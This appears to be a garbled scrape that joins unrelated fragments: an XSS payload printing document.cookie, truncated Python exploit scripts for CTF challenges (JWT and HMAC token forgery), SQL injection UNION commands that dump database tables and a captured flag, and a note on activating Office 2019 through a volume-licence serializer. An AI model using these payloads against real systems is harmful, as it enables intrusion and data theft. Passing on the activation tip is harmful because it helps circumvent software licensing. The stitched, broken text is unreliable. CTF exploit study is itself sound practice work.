| alert(document.cookie) |
| #!/usr/bin/env python3 | |
| from httpx import * | |
| from sys import exit | |
| import string | |
| client =Client(base_url='<url>',cookies={"<name1>":"<value1>"},follow_redirects=False) | |
| api = '<endpoint>' | |
| temp_json = json={"<field1>":"<field2>"} | |
| def dumplength(l): |
2019-06-03
Note that Office2019 DO NOT support activate via simple copy/paste plist license file which is the simplest way to activate Office 2016. Fortunately, you can also use the VL Serializer tool, just install Office 2019 and Serializer, then run Serializer to activate.
./exploit.py "admin' UNION ALL SELECT table_name,2,3,4 FROM information_schema.tables WHERE table_schema=database()#"
./exploit.py "admin' UNION ALL SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='flags'#"
./exploit.py "admin' UNION ALL SELECT id,flag,0,0 from flags#"
FLAG : dctf{Pump_7h3_s7r3am_h4s5_up!_353aa965}
| #!/usr/bin/env python3 | |
| from httpx import * | |
| import base64 | |
| url = "http://34.148.103.218:4829/" | |
| def login(): | |
| return get(url+'login').cookies['access_token_cookie'] | |
| def sign_hmac(unsigned_token): | |
| return post(url+'api/sign-hmac',data={"message":unsigned_token}).text |
| #!/usr/bin/env python3 | |
| #exploit written by ryn0(krn_bhargav) | |
| from requests import Session,get | |
| from bs4 import BeautifulSoup | |
| import jwt | |
| url = 'http://chall.nitdgplug.org:30623' | |
| pub_key = open('pub.key','r').read() | |
| pvt_key = open('pvt.key','r').read() | |
| n='AL2dm+Myrfhs96B/kMzGkxeUnkuSDBf9axQ2PvRBLGCAo5CpCwNJBIS5pjr9InHCuJhs4486tZt3Fplxe9KmpnJQpuN7Q/LU6ZAF2QXsdWmj1IkLjYJ+7iecCSSZZjtiPtnZN/Pkyv/1FjxWm8p9pHoVjJ+dcw9TtufaAzJ2jilBQrhUFSPEu5863vyJT1Ov1otuTg12C7rs13RCcSaQhpf9lRmYM1HZ0aiqLgrQO+PPaGWYnk42hJHgn2TVsLt4+fkCaVzx7zHQ52dzLoAr+DKOCu9NcEzHKNSQRqlv+OwP2dLcPiRtdO9KnBT1V5j5UilKIU9lCAJOX43ZEDHZycU=' |
